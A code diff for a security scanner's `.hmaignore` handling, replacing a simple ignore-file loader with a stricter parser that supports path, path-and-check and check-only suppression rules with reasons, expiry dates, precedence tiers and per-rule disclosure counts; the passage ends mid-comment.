@@ -1935,7 +1935,7 @@ function isRealCalendarDate(value: string): boolean {
 }
 
 /**
- * The two-step `.hmaignore` parser (CPO reconciliation §1, steps (a)-(h)).
+ * The two-step `.hmaignore` parser, steps (a)-(h).
  * `today` is the scan clock's UTC calendar date as `YYYY-MM-DD`, injected so
  * the row table in the tests is deterministic; a rule is active while
  * `today <= expires` (inclusive of the named day), and a lapsed rule is an
@@ -1975,12 +1975,12 @@ export function parseHmaIgnore(content: string, today: string): { rules: HmaIgno
       if (!m || !/^expires:/i.test(m[1])) break;
       const token = m[1];
       if (expires !== undefined) {
-        attrError = 'two `expires:` attributes on one line — write one';
+        attrError = 'two `expires:` attributes on one line; keep one';
         break;
       }
       const value = token.slice('expires:'.length);
       if (!isRealCalendarDate(value)) {
-        attrError = `\`${token}\` is not a valid date — write \`expires:YYYY-MM-DD\``;
+        attrError = `\`${token}\` is not a valid date; write \`expires:YYYY-MM-DD\``;
         break;
       }
       expires = value;
@@ -2001,7 +2001,7 @@ export function parseHmaIgnore(content: string, today: string): { rules: HmaIgno
       // runner agree at the same instant). From the next UTC day the line is
       // an error and its findings return to the report.
       if (expires !== undefined && today > expires) {
-        fail(`expired on ${expires} — the rule is no longer applied and its findings are reported again`);
+        fail(`expired on ${expires}; the rule is no longer applied and its findings are reported again`);
         return;
       }
       rules.push({ line: lineNo, rule: asWritten, ...rule });
@@ -2010,11 +2010,11 @@ export function parseHmaIgnore(content: string, today: string): { rules: HmaIgno
     // (d) `!<CHECK PATTERN>` — presentational check suppression
     if (text.startsWith('!')) {
       const pattern = text.slice(1);
-      if (pattern.length === 0) { fail('empty check pattern — write `!<CHECK-ID>`'); continue; }
+      if (pattern.length === 0) { fail('empty check pattern; write `!<CHECK-ID>`'); continue; }
       const wellFormed = pattern.includes('*')
         ? CHECK_PATTERN_WITH_STAR.test(pattern)
         : CHECK_PATTERN_EXACT.test(pattern);
-      if (!wellFormed) { fail(`\`${pattern}\` is not a check pattern`); continue; }
+      if (!wellFormed) { fail(`\`${pattern}\` is not a check pattern; write \`!<CHECK-ID>\` (for example \`!NEMO-009\`), or a path without the \`!\``); continue; }
       attach({
         channel: CHECK_CHANNEL,
         checkId: pattern.toUpperCase(),
@@ -2037,11 +2037,11 @@ export function parseHmaIgnore(content: string, today: string): { rules: HmaIgno
         // contains `/`, `\`, `.` or whitespace: not a check; the line is a path
       } else if (suffix.includes('*')) {
         if (/^[*-]+$/.test(suffix)) {
-          suffixError = `\`${text}\` — \`<path>:*\` is not a form; write \`${prefix}\` to exclude the whole path`;
+          suffixError = `\`<path>:*\` is not a form; write \`${prefix}\` to exclude the whole path`;
         } else if (CHECK_PATTERN_WITH_STAR.test(suffix)) {
           isPathCheck = true;
         } else {
-          suffixError = `\`${suffix}\` is a malformed check pattern`;
+          suffixError = `\`${suffix}\` is a malformed check pattern; use letters, digits, \`-\` and \`*\` only`;
         }
       } else if (CHECK_PATTERN_EXACT.test(suffix)) {
         isPathCheck = true;
@@ -2052,10 +2052,10 @@ export function parseHmaIgnore(content: string, today: string): { rules: HmaIgno
 
     if (isPathCheck) {
       // never a silent fallback to a path: each failed requirement is an error
-      if (prefix.length === 0) { fail('empty path — write `<path>:<CHECK-ID>`'); continue; }
-      if (prefix.includes('*')) { fail('globs are not supported in path rules'); continue; }
+      if (prefix.length === 0) { fail('empty path; write `<path>:<CHECK-ID>`'); continue; }
+      if (prefix.includes('*')) { fail('globs are not supported in path rules; write a file or directory path (a directory covers everything under it)'); continue; }
       if (reason.length === 0) {
-        fail('a `<path>:<CHECK-ID>` rule requires a reason — append `# <why>`');
+        fail('a `<path>:<CHECK-ID>` rule requires a reason; append `# <why>`');
         continue;
       }
       attach({
@@ -2071,7 +2071,7 @@ export function parseHmaIgnore(content: string, today: string): { rules: HmaIgno
     // (g) a path containing `*` is a loud error, never a silent no-op —
     // `*.py` and `dan*` matched nothing at all before this parser existed.
     // `[` is NOT a glob here (`app/[slug]/page.tsx` is a real path).
-    if (text.includes('*')) { fail('globs are not supported in path rules'); continue; }
+    if (text.includes('*')) { fail('globs are not supported in path rules; write a file or directory path (a directory covers everything under it)'); continue; }
     attach({
       channel: WHOLE_PATH_CHANNEL,
       path: text,
@@ -2131,7 +2131,7 @@ export function isPathIgnored(filePath: string, ignoredPaths: string[]): boolean
 
 /**
  * THE check-pattern matcher — the one `secure` has always shipped, now the
- * only one (CA (4)): case-insensitive ids, `*` anywhere in the pattern.
+ * only one: case-insensitive ids, `*` anywhere in the pattern.
  * `check` gains parity; the narrower trailing-`*`-only, case-sensitive
  * matcher that used to live beside it is deleted, because a grammar stricter
  * than its matcher would silently reopen the class this unit closes.
@@ -2207,7 +2207,7 @@ export interface HmaIgnoreMatch {
 
 /**
  * Classify one finding against a parsed `.hmaignore` — the one place the
- * three channels' precedence lives. Tiers, in order (CPO reconciliation §4):
+ * three channels' precedence lives. Tiers, in order:
  * whole-path, then `<path>:<CHECK>`, then `!<CHECK>`. A flat first-in-file-
  * order walk would let a `!NEMO-009` on line 1 keep a `danger.py:NEMO-009`
  * finding in the exit code, inverting the scope semantics.
@@ -2262,7 +2262,7 @@ export function matchHmaIgnore(
 
 /**
  * Project a parsed file plus per-line match counts into the disclosure the
- * CLI carries (CA (3)). `matchedByLine` must be counted over EXACTLY the
+ * CLI carries. `matchedByLine` must be counted over EXACTLY the
  * findings the `suppressed`/`outOfScope` Rows count — that identity is the
  * Σ-matched cross-check in the tests. A `<path>:<CHECK>` rule absorbed by a
  * whole-path rule carries `redundantTo` (and, the tiers being what they are,

--- a/src/hardening/scanner.ts
+++ b/src/hardening/scanner.ts
@@ -15,7 +15,8 @@ import * as crypto from 'crypto';
 import * as os from 'os';
 import * as path from 'path';
 import { execFile } from 'child_process';
-import type { ScanResult, SecurityFinding, SecurityFindingDraft, Severity, ProjectType } from './security-check';
+import type { ScanResult, SecurityFinding, SecurityFindingDraft, Severity, ProjectType, HmaIgnoreDisclosure } from './security-check';
+import { isScopeChannel } from './security-check';
 import { emitFinding, reemitFinding } from './finding-emit';
 import { StructuralAnalyzer, toSecurityFindings, LLMAnalyzer } from '../semantic';
 import { enrichWithTaxonomy, TAXONOMY_EXEMPT_CHECKIDS } from './taxonomy';
@@ -1860,34 +1861,259 @@ function blankCommentRegions(line: string, state: { inBlockComment: boolean }): 
 }
 
 /**
- * Parsed .hmaignore rules split into path patterns and check ID patterns.
- * Check ID patterns start with `!` and support trailing `*` wildcards.
- * Example: `!SANDBOX-*` suppresses all SANDBOX checks.
+ * One parsed `.hmaignore` rule. Three channels, one file:
+ *
+ *   `<path>`                — scope: the path leaves the score and the exit code
+ *   `<path>:<CHECK-ID>`     — scope, narrowed to one check on that path
+ *   `!<CHECK-ID>`           — presentational: listed out, still scored and gated
+ *
+ * Every rule may carry a trailing `# <reason>` comment and an
+ * `expires:<YYYY-MM-DD>` attribute at the end of the line. A
+ * `<path>:<CHECK-ID>` rule REQUIRES the reason.
  */
-export interface HmaIgnoreRules {
-  paths: string[];
-  checkIds: string[];
+export interface HmaIgnoreRule {
+  /** 1-based line in the file. */
+  line: number;
+  /** The line as written. */
+  rule: string;
+  channel: 'hmaignore-path' | 'hmaignore-check' | 'hmaignore-path-check';
+  /** Present for hmaignore-path and hmaignore-path-check. */
+  path?: string;
+  /** Present for hmaignore-check and hmaignore-path-check; UPPER-CASED pattern. */
+  checkId?: string;
+  /** Trailing `# <reason>` text, when non-empty. */
+  reason?: string;
+  /** YYYY-MM-DD as written. Only active rules parse into `rules`. */
+  expires?: string;
+}
+
+export interface HmaIgnoreParseError {
+  /** 1-based line; 0 for a file that exists and cannot be read. */
+  line: number;
+  /** The line as written ('' for the unreadable-file entry). */
+  rule: string;
+  error: string;
+}
+
+export interface ParsedHmaIgnore {
+  /** True iff a `.hmaignore` exists at the target (readable or not). */
+  present: boolean;
+  /** '.hmaignore', relative to the target. */
+  file: string;
+  rules: HmaIgnoreRule[];
+  /**
+   * Every line the parser refused, one entry per line, loud and EXIT-NEUTRAL:
+   * an unparseable, refused, lapsed or unreadable rule is inert, so everything
+   * it would have hidden is already in the score and the exit code.
+   */
+  errors: HmaIgnoreParseError[];
 }
 
 /**
- * Load .hmaignore patterns from a target directory. Exported so CLI
- * can re-apply ignore filtering after NanoMind merge.
+ * The two check-pattern expressions (CPO reconciliation §1(f)) — one grammar
+ * shared by `!<CHECK>` and `<path>:<CHECK>`. Matched case-insensitively;
+ * matched ids are stored upper-cased, which is what the `secure` matcher has
+ * always done at runtime.
  */
-export async function loadHmaIgnore(targetDir: string): Promise<HmaIgnoreRules> {
-  const ignorePath = path.join(targetDir, '.hmaignore');
-  try {
-    const content = await fs.readFile(ignorePath, 'utf-8');
-    const lines = content
-      .split('\n')
-      .map(line => line.trim())
-      .filter(line => line && !line.startsWith('#'));
-    return {
-      paths: lines.filter(l => !l.startsWith('!')),
-      checkIds: lines.filter(l => l.startsWith('!')).map(l => l.slice(1)),
+const CHECK_PATTERN_WITH_STAR = /^[A-Z0-9*]+(-[A-Z0-9*]+)*$/i;
+const CHECK_PATTERN_EXACT = /^[A-Z][A-Z0-9]*(-[A-Z0-9]+)+$/i;
+
+// The three channel spellings, written once. Every comparison below goes
+// through these names (or `isScopeChannel`), never a string literal — a
+// literal comparison is the pattern that let a fourth channel fall through
+// the partition onto the wrong side of the gate.
+const WHOLE_PATH_CHANNEL: HmaIgnoreRule['channel'] = 'hmaignore-path';
+const PATH_CHECK_CHANNEL: HmaIgnoreRule['channel'] = 'hmaignore-path-check';
+const CHECK_CHANNEL: HmaIgnoreRule['channel'] = 'hmaignore-check';
+
+/** `2026-02-30` is not a date; neither is `2026-1-5` (zero-padded only). */
+function isRealCalendarDate(value: string): boolean {
+  if (!/^\d{4}-\d{2}-\d{2}$/.test(value)) return false;
+  const [y, m, d] = value.split('-').map(Number);
+  const dt = new Date(Date.UTC(y, m - 1, d));
+  return dt.getUTCFullYear() === y && dt.getUTCMonth() === m - 1 && dt.getUTCDate() === d;
+}
+
+/**
+ * The two-step `.hmaignore` parser (CPO reconciliation §1, steps (a)-(h)).
+ * `today` is the scan clock's UTC calendar date as `YYYY-MM-DD`, injected so
+ * the row table in the tests is deterministic; a rule is active while
+ * `today <= expires` (inclusive of the named day), and a lapsed rule is an
+ * error entry, not a rule.
+ */
+export function parseHmaIgnore(content: string, today: string): { rules: HmaIgnoreRule[]; errors: HmaIgnoreParseError[] } {
+  const rules: HmaIgnoreRule[] = [];
+  const errors: HmaIgnoreParseError[] = [];
+  const lines = content.split('\n');
+  for (let i = 0; i < lines.length; i++) {
+    const lineNo = i + 1;
+    let raw = lines[i].replace(/\r$/, '');
+    // (a) strip a leading BOM, trim, skip blanks and whole-line comments
+    if (lineNo === 1 && raw.charCodeAt(0) === 0xfeff) raw = raw.slice(1);
+    const asWritten = raw.trim();
+    const fail = (error: string) => errors.push({ line: lineNo, rule: asWritten, error });
+    if (asWritten.length === 0 || asWritten[0] === '#') continue;
+
+    // (b) a `#` preceded by whitespace begins the trailing comment; the text
+    // after it, trimmed, is the reason. `danger.py#1` is a path; `danger.py
+    // # fixture` is a path with a reason.
+    let text = asWritten;
+    let reason = '';
+    for (let j = 1; j < text.length; j++) {
+      if (text[j] === '#' && (text[j - 1] === ' ' || text[j - 1] === '\t')) {
+        reason = text.slice(j + 1).trim();
+        text = text.slice(0, j).trimEnd();
+        break;
+      }
+    }
+
+    // (c) pull attributes from the END of what remains, repeatedly
+    let expires: string | undefined;
+    let attrError: string | undefined;
+    for (;;) {
+      const m = text.match(/(\S+)\s*$/);
+      if (!m || !/^expires:/i.test(m[1])) break;
+      const token = m[1];
+      if (expires !== undefined) {
+        attrError = 'two `expires:` attributes on one line — write one';
+        break;
+      }
+      const value = token.slice('expires:'.length);
+      if (!isRealCalendarDate(value)) {
+        attrError = `\`${token}\` is not a valid date — write \`expires:YYYY-MM-DD\``;
+        break;
+      }
+      expires = value;
+      text = text.slice(0, text.length - m[0].length).trimEnd();
+    }
+    if (attrError) { fail(attrError); continue; }
+    if (/(^|\s)expires:/i.test(text)) {
+      fail('`expires:` must follow the rule, at the end of the line');
+      continue;
+    }
+    if (text.length === 0) {
+      fail('an `expires:` attribute needs a rule in front of it');
+      continue;
+    }
+
+    const attach = (rule: Omit<HmaIgnoreRule, 'line' | 'rule'>) => {
+      // §2 — active while `today <= date` (ISO strings, so a laptop and a CI
+      // runner agree at the same instant). From the next UTC day the line is
+      // an error and its findings return to the report.
+      if (expires !== undefined && today > expires) {
+        fail(`expired on ${expires} — the rule is no longer applied and its findings are reported again`);
+        return;
+      }
+      rules.push({ line: lineNo, rule: asWritten, ...rule });
     };
-  } catch {
-    return { paths: [], checkIds: [] };
+
+    // (d) `!<CHECK PATTERN>` — presentational check suppression
+    if (text.startsWith('!')) {
+      const pattern = text.slice(1);
+      if (pattern.length === 0) { fail('empty check pattern — write `!<CHECK-ID>`'); continue; }
+      const wellFormed = pattern.includes('*')
+        ? CHECK_PATTERN_WITH_STAR.test(pattern)
+        : CHECK_PATTERN_EXACT.test(pattern);
+      if (!wellFormed) { fail(`\`${pattern}\` is not a check pattern`); continue; }
+      attach({
+        channel: CHECK_CHANNEL,
+        checkId: pattern.toUpperCase(),
+        ...(reason ? { reason } : {}),
+        ...(expires !== undefined ? { expires } : {}),
+      });
+      continue;
+    }
+
+    // (e) split at the LAST colon and classify the suffix
+    const idx = text.lastIndexOf(':');
+    let isPathCheck = false;
+    let suffix = '';
+    let prefix = text;
+    let suffixError: string | undefined;
+    if (idx >= 0) {
+      suffix = text.slice(idx + 1);
+      prefix = text.slice(0, idx);
+      if (/[/\\.\s]/.test(suffix)) {
+        // contains `/`, `\`, `.` or whitespace: not a check; the line is a path
+      } else if (suffix.includes('*')) {
+        if (/^[*-]+$/.test(suffix)) {
+          suffixError = `\`${text}\` — \`<path>:*\` is not a form; write \`${prefix}\` to exclude the whole path`;
+        } else if (CHECK_PATTERN_WITH_STAR.test(suffix)) {
+          isPathCheck = true;
+        } else {
+          suffixError = `\`${suffix}\` is a malformed check pattern`;
+        }
+      } else if (CHECK_PATTERN_EXACT.test(suffix)) {
+        isPathCheck = true;
+      }
+      // otherwise (`snapshot-10:30`): not letter-led-and-dashed, stays a path
+    }
+    if (suffixError) { fail(suffixError); continue; }
+
+    if (isPathCheck) {
+      // never a silent fallback to a path: each failed requirement is an error
+      if (prefix.length === 0) { fail('empty path — write `<path>:<CHECK-ID>`'); continue; }
+      if (prefix.includes('*')) { fail('globs are not supported in path rules'); continue; }
+      if (reason.length === 0) {
+        fail('a `<path>:<CHECK-ID>` rule requires a reason — append `# <why>`');
+        continue;
+      }
+      attach({
+        channel: PATH_CHECK_CHANNEL,
+        path: prefix,
+        checkId: suffix.toUpperCase(),
+        reason,
+        ...(expires !== undefined ? { expires } : {}),
+      });
+      continue;
+    }
+
+    // (g) a path containing `*` is a loud error, never a silent no-op —
+    // `*.py` and `dan*` matched nothing at all before this parser existed.
+    // `[` is NOT a glob here (`app/[slug]/page.tsx` is a real path).
+    if (text.includes('*')) { fail('globs are not supported in path rules'); continue; }
+    attach({
+      channel: WHOLE_PATH_CHANNEL,
+      path: text,
+      ...(reason ? { reason } : {}),
+      ...(expires !== undefined ? { expires } : {}),
+    });
   }
+  return { rules, errors };
+}
+
+/** The scan clock's UTC calendar date, the production value of `today` (h). */
+export function utcToday(): string {
+  return new Date().toISOString().slice(0, 10);
+}
+
+/**
+ * Load and parse `.hmaignore` from a target directory. THE one parser —
+ * `secure`, the post-NanoMind re-filter and `check` all read this. Exported
+ * so the CLI can re-apply ignore filtering after NanoMind merge.
+ *
+ * A missing file is `present: false` and nothing else; a file that exists
+ * and cannot be read is `present: true` with an `errors[]` entry at line 0
+ * carrying the errno — loud, and exit-neutral like every other error here.
+ */
+export async function loadHmaIgnore(targetDir: string, today: string = utcToday()): Promise<ParsedHmaIgnore> {
+  const ignorePath = path.join(targetDir, '.hmaignore');
+  let content: string;
+  try {
+    content = await fs.readFile(ignorePath, 'utf-8');
+  } catch (err) {
+    const code = (err as NodeJS.ErrnoException)?.code;
+    if (code === 'ENOENT') {
+      return { present: false, file: '.hmaignore', rules: [], errors: [] };
+    }
+    return {
+      present: true,
+      file: '.hmaignore',
+      rules: [],
+      errors: [{ line: 0, rule: '', error: `cannot read .hmaignore (${code ?? 'unknown errno'})` }],
+    };
+  }
+  return { present: true, file: '.hmaignore', ...parseHmaIgnore(content, today) };
 }
 
 /**
@@ -1904,17 +2130,170 @@ export function isPathIgnored(filePath: string, ignoredPaths: string[]): boolean
 }
 
 /**
- * Check if a checkId matches any .hmaignore check ID pattern.
- * Supports exact match and trailing `*` wildcard (e.g. `SANDBOX-*`).
+ * THE check-pattern matcher — the one `secure` has always shipped, now the
+ * only one (CA (4)): case-insensitive ids, `*` anywhere in the pattern.
+ * `check` gains parity; the narrower trailing-`*`-only, case-sensitive
+ * matcher that used to live beside it is deleted, because a grammar stricter
+ * than its matcher would silently reopen the class this unit closes.
  */
-export function isCheckIgnored(checkId: string, ignoredChecks: string[]): boolean {
-  if (!checkId || ignoredChecks.length === 0) return false;
-  return ignoredChecks.some(pattern => {
-    if (pattern.endsWith('*')) {
-      return checkId.startsWith(pattern.slice(0, -1));
+export function matchesCheckPattern(checkId: string, pattern: string): boolean {
+  if (!checkId || !pattern) return false;
+  const upper = checkId.toUpperCase();
+  const p = pattern.toUpperCase();
+  if (p.includes('*')) {
+    const regexStr = '^' + p.replace(/[.+^${}()|[\]\\]/g, '\\$&').replace(/\*/g, '.*') + '$';
+    return new RegExp(regexStr).test(upper);
+  }
+  return upper === p;
+}
+
+/**
+ * Every path a finding speaks for — `details.files` plus `file` (#280).
+ * Module-level so `secure`'s scan pass, the post-merge re-filter and the
+ * `check` arm apply one rulebook.
+ */
+export function coveredFilesOfFinding(f: { file?: string; details?: Record<string, unknown> }): string[] {
+  const listed = Array.isArray(f.details?.files) ? (f.details.files as unknown[]) : [];
+  return [...new Set(
+    [f.file, ...listed].filter(
+      (p): p is string => typeof p === 'string' && p.length > 0,
+    ),
+  )];
+}
+
+/**
+ * #280 — decide whether a set of ignored paths suppresses a finding, keying
+ * on ALL the paths it covers. Returns true to KEEP; may re-point `f.file` /
+ * `f.details.files` onto surviving paths in place. See the method of the
+ * same name on `HardeningScanner` for the full history; the logic moved to
+ * module level so the `<path>:<CHECK>` tier and the `check` command share it.
+ */
+export function retainAfterPathSuppression(
+  f: { checkId: string; file?: string; details?: Record<string, unknown> },
+  ignoredPaths: string[],
+): boolean {
+  // A coverage statement is not a finding ABOUT a path's contents, so a path
+  // rule cannot scope it away (#438).
+  if (f.checkId === 'SCAN-UNREAD-001') return true;
+
+  const covered = coveredFilesOfFinding(f);
+  // Nothing path-shaped to judge — a finding about the tree as a whole.
+  if (covered.length === 0) return true;
+
+  const survivors = covered.filter((p) => !isPathIgnored(p, ignoredPaths));
+  if (survivors.length === 0) return false;
+  if (survivors.length === covered.length) return true;
+
+  // Partially ignored: keep it, but stop naming suppressed paths.
+  if (f.file && isPathIgnored(f.file, ignoredPaths)) {
+    f.file = survivors[0];
+  }
+  if (Array.isArray(f.details?.files)) {
+    (f.details as { files: string[] }).files = survivors;
+  }
+  return true;
+}
+
+/** What `matchHmaIgnore` decided for one finding. */
+export interface HmaIgnoreMatch {
+  channel: 'hmaignore-path' | 'hmaignore-check' | 'hmaignore-path-check';
+  /**
+   * 1-based line of the attributed rule — the first matching rule in file
+   * order WITHIN the winning tier. Undefined when a programmatic ignore path
+   * (no `.hmaignore` line) did the covering.
+   */
+  line?: number;
+}
+
+/**
+ * Classify one finding against a parsed `.hmaignore` — the one place the
+ * three channels' precedence lives. Tiers, in order (CPO reconciliation §4):
+ * whole-path, then `<path>:<CHECK>`, then `!<CHECK>`. A flat first-in-file-
+ * order walk would let a `!NEMO-009` on line 1 keep a `danger.py:NEMO-009`
+ * finding in the exit code, inverting the scope semantics.
+ *
+ * May re-point a partially-covered multi-file finding in place (#280).
+ * Returns null when no rule matches (the finding stays reported).
+ */
+export function matchHmaIgnore(
+  f: { checkId: string; file?: string; details?: Record<string, unknown> },
+  parsed: ParsedHmaIgnore,
+  additionalIgnorePaths: string[] = [],
+): HmaIgnoreMatch | null {
+  const wholePathRules = parsed.rules.filter((r) => r.channel === WHOLE_PATH_CHANNEL);
+  const allPaths = [...wholePathRules.map((r) => r.path as string), ...additionalIgnorePaths];
+
+  // Tier 1: whole-path. Suppresses only when EVERY covered path is ignored;
+  // otherwise keeps the finding, re-pointed off the ignored paths.
+  if (allPaths.length > 0 && !retainAfterPathSuppression(f, allPaths)) {
+    const attributed =
+      wholePathRules.find((r) => f.file && isPathIgnored(f.file, [r.path as string]))
+      ?? wholePathRules.find((r) => coveredFilesOfFinding(f).some((p) => isPathIgnored(p, [r.path as string])));
+    return { channel: WHOLE_PATH_CHANNEL, line: attributed?.line };
+  }
+
+  // Tier 2: `<path>:<CHECK>` — scope, narrowed to one check. Same whole-set
+  // rule as tier 1, over the paths of the rules whose pattern matches this
+  // check; the same SCAN-UNREAD-001 carve-out (a path rule cannot make an
+  // unread file read, and neither can a narrower one).
+  if (f.checkId !== 'SCAN-UNREAD-001') {
+    const pcRules = parsed.rules.filter(
+      (r) => r.channel === PATH_CHECK_CHANNEL && matchesCheckPattern(f.checkId, r.checkId as string),
+    );
+    if (pcRules.length > 0) {
+      const covered = coveredFilesOfFinding(f);
+      const pcPaths = pcRules.map((r) => r.path as string);
+      if (covered.length > 0 && covered.every((p) => isPathIgnored(p, pcPaths))) {
+        const attributed =
+          pcRules.find((r) => f.file && isPathIgnored(f.file, [r.path as string])) ?? pcRules[0];
+        return { channel: PATH_CHECK_CHANNEL, line: attributed.line };
+      }
     }
-    return checkId === pattern;
-  });
+  }
+
+  // Tier 3: `!<CHECK>` — presentational.
+  const checkRule = parsed.rules.find(
+    (r) => r.channel === CHECK_CHANNEL && matchesCheckPattern(f.checkId, r.checkId as string),
+  );
+  if (checkRule) return { channel: CHECK_CHANNEL, line: checkRule.line };
+
+  return null;
+}
+
+/**
+ * Project a parsed file plus per-line match counts into the disclosure the
+ * CLI carries (CA (3)). `matchedByLine` must be counted over EXACTLY the
+ * findings the `suppressed`/`outOfScope` Rows count — that identity is the
+ * Σ-matched cross-check in the tests. A `<path>:<CHECK>` rule absorbed by a
+ * whole-path rule carries `redundantTo` (and, the tiers being what they are,
+ * `matched: 0`) — reported redundant, never silently swallowed.
+ */
+export function buildHmaIgnoreDisclosure(
+  parsed: ParsedHmaIgnore,
+  matchedByLine: ReadonlyMap<number, number>,
+): HmaIgnoreDisclosure | undefined {
+  if (!parsed.present) return undefined;
+  const wholePathRules = parsed.rules.filter((r) => r.channel === WHOLE_PATH_CHANNEL);
+  return {
+    file: parsed.file,
+    rules: parsed.rules.map((r) => {
+      const absorbedBy = r.channel === PATH_CHECK_CHANNEL
+        ? wholePathRules.find((wp) => isPathIgnored(r.path as string, [wp.path as string]))
+        : undefined;
+      return {
+        line: r.line,
+        rule: r.rule,
+        channel: r.channel,
+        ...(r.path !== undefined ? { path: r.path } : {}),
+        ...(r.checkId !== undefined ? { checkId: r.checkId } : {}),
+        ...(r.reason !== undefined ? { reason: r.reason } : {}),
+        ...(r.expires !== undefined ? { expires: r.expires } : {}),
+        matched: matchedByLine.get(r.line) ?? 0,
+        ...(absorbedBy ? { redundantTo: absorbedBy.line } : {}),
+      };
+    }),
+    errors: parsed.errors.map((e) => ({ line: e.line, rule: e.rule, error: e.error })),
+  };
 }
 
 const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB max file size to prevent memory exhaustion
@@ -2621,51 +3000,6 @@ export class HardeningScanner {
   }
 
   /**
-   * Load .hmaignore file from target directory.
-   * Returns path patterns (plain lines) and check ID suppression patterns (lines starting with !).
-   */
-  private async loadHmaIgnore(targetDir: string): Promise<{ paths: string[]; checkIds: string[] }> {
-    const ignorePath = path.join(targetDir, '.hmaignore');
-    try {
-      const content = await fs.readFile(ignorePath, 'utf-8');
-      const lines = content
-        .split('\n')
-        .map(line => line.trim())
-        .filter(line => line && !line.startsWith('#'));
-      const paths: string[] = [];
-      const checkIds: string[] = [];
-      for (const line of lines) {
-        if (line.startsWith('!')) {
-          // Check ID suppression pattern: strip the ! prefix, store uppercase
-          checkIds.push(line.slice(1).toUpperCase());
-        } else {
-          paths.push(line);
-        }
-      }
-      return { paths, checkIds };
-    } catch {
-      return { paths: [], checkIds: [] };
-    }
-  }
-
-  /**
-   * Check if a check ID matches any suppression pattern from .hmaignore.
-   * Supports exact match and wildcard (*) at the end (e.g. SANDBOX-* matches SANDBOX-001).
-   */
-  private isCheckIdSuppressed(checkId: string, patterns: string[]): boolean {
-    if (patterns.length === 0) return false;
-    const upper = checkId.toUpperCase();
-    return patterns.some(pattern => {
-      if (pattern.includes('*')) {
-        // Convert glob pattern to regex: escape special chars, replace * with .*
-        const regexStr = '^' + pattern.replace(/[.+^${}()|[\]\\]/g, '\\$&').replace(/\*/g, '.*') + '$';
-        return new RegExp(regexStr).test(upper);
-      }
-      return upper === pattern;
-    });
-  }
-
-  /**
    * Re-apply .hmaignore filters to a set of findings.
    * Call this after NanoMind merge overwrites result.findings with unfiltered data.
    *
@@ -2695,16 +3029,18 @@ export class HardeningScanner {
     projectType: ProjectType,
     additionalIgnorePaths?: string[],
   ): Promise<T[]> {
-    const hmaIgnore = await this.loadHmaIgnore(targetDir);
-    const allIgnoredPaths = [...hmaIgnore.paths, ...(additionalIgnorePaths || [])];
-    const suppressedCheckPatterns = hmaIgnore.checkIds;
+    const parsed = await loadHmaIgnore(targetDir);
+    const extraPaths = additionalIgnorePaths || [];
 
     // Reset FIRST, and on the no-op path too: a reused scanner instance must not
     // let the previous target's scope narrowing be disclosed against this one.
     this.lastOutOfScope = [];
     this.lastSuppressed = [];
+    // Presence rule, not rule-count rule: an empty or all-error file still
+    // discloses itself (and its errors) on this run.
+    this.lastHmaIgnore = buildHmaIgnoreDisclosure(parsed, new Map());
 
-    if (allIgnoredPaths.length === 0 && suppressedCheckPatterns.length === 0) {
+    if (parsed.rules.length === 0 && extraPaths.length === 0) {
       return findings;
     }
 
@@ -2712,30 +3048,33 @@ export class HardeningScanner {
     // rule is MARKED and kept, because this runs after the NanoMind merge on the
     // very array the CLI recomputes the score from, so returning a shortened
     // array re-created the laundering the scan path had just stopped doing. A
-    // path rule is a scope change and leaves the array, with the summary parked
-    // on `lastOutOfScope` for the caller to disclose. Callers render with
-    // `isDisplayed()`.
+    // path-shaped rule (whole-path or `<path>:<CHECK>`) is a scope change and
+    // leaves the array, with the summary parked on `lastOutOfScope` for the
+    // caller to disclose. Callers render with `isDisplayed()`.
     const pathExcluded: T[] = [];
     const checkSuppressed: T[] = [];
+    const attribution = new Map<T, number>();
     for (const f of findings) {
-      // Already out of scope from the scan pass. It must be re-collected, not
-      // skipped: `nmResult.mergedFindings` is rebuilt from `allFindings`, which
-      // holds the SAME objects `scanInner` marked, so an early `continue` here
-      // let every path-excluded finding ride back into the scored array. That
-      // put HMA's own 65 excluded fixture findings on both the `Scope` line and
-      // the `Suppressed` line while still scoring them 0/100 — the marking was
-      // idempotent, the filtering was not.
-      if (f.suppressedBy === 'hmaignore-path') { pathExcluded.push(f); continue; }
-      if (f.suppressed) { checkSuppressed.push(f); continue; }
-      if (this.isCheckIdSuppressed(f.checkId, suppressedCheckPatterns)) {
+      // A finding the caller suppressed by flag keeps that channel; only the
+      // `.hmaignore` channels are re-derived here.
+      if (f.suppressedBy === 'ignore-flag') { checkSuppressed.push(f); continue; }
+      // Findings the scan pass already marked are re-CLASSIFIED, not skipped:
+      // `nmResult.mergedFindings` is rebuilt from `allFindings`, which holds
+      // the SAME objects `scanInner` marked, so an early `continue` here let
+      // every path-excluded finding ride back into the scored array. Rules and
+      // file are the same, so re-classification lands where the scan pass did —
+      // and carries the per-rule attribution the disclosure needs.
+      const m = matchHmaIgnore(f, parsed, extraPaths);
+      if (m) {
         f.suppressed = true;
-        f.suppressedBy = 'hmaignore-check';
+        f.suppressedBy = m.channel;
+        if (m.line !== undefined) attribution.set(f, m.line);
+        if (isScopeChannel(m.channel)) pathExcluded.push(f);
+        else checkSuppressed.push(f);
+      } else if (f.suppressed) {
+        // Marked earlier by a channel this file does not explain (defensive:
+        // the base behaviour kept such findings on the suppressed side).
         checkSuppressed.push(f);
-      } else if (!this.retainAfterPathSuppression(f, allIgnoredPaths)) {
-        // #280 — keys on every covered path, not just `f.file`.
-        f.suppressed = true;
-        f.suppressedBy = 'hmaignore-path';
-        pathExcluded.push(f);
       }
     }
     // #457 — the DISCLOSURE is gated on what would have been reported; the
@@ -2761,6 +3100,15 @@ export class HardeningScanner {
     const reportable = (f: SecurityFindingDraft) => isReportableFinding(f, projectType);
     this.lastOutOfScope = summarizeSuppressed(pathExcluded.filter(reportable));
     this.lastSuppressed = summarizeSuppressed(checkSuppressed.filter(reportable));
+    // Σ matched per rule ≡ the Row counts above: counted over the same arrays,
+    // through the same reportable + countsAgainstScore gates the summaries use.
+    const matchedByLine = new Map<number, number>();
+    for (const f of [...pathExcluded, ...checkSuppressed]) {
+      if (!reportable(f) || !countsAgainstScore(f)) continue;
+      const line = attribution.get(f);
+      if (line !== undefined) matchedByLine.set(line, (matchedByLine.get(line) ?? 0) + 1);
+    }
+    this.lastHmaIgnore = buildHmaIgnoreDisclosure(parsed, matchedByLine);
     if (pathExcluded.length === 0 && checkSuppressed.length === 0) return findings;
     const removed = new Set([...pathExcluded, ...checkSuppressed]);
     return findings.filter((f) => !removed.has(f));
@@ -2784,6 +3132,15 @@ export class HardeningScanner {
   lastSuppressed: ReturnType<typeof summarizeSuppressed> = [];
 
   /**
+   * The per-rule `.hmaignore` disclosure from the most recent
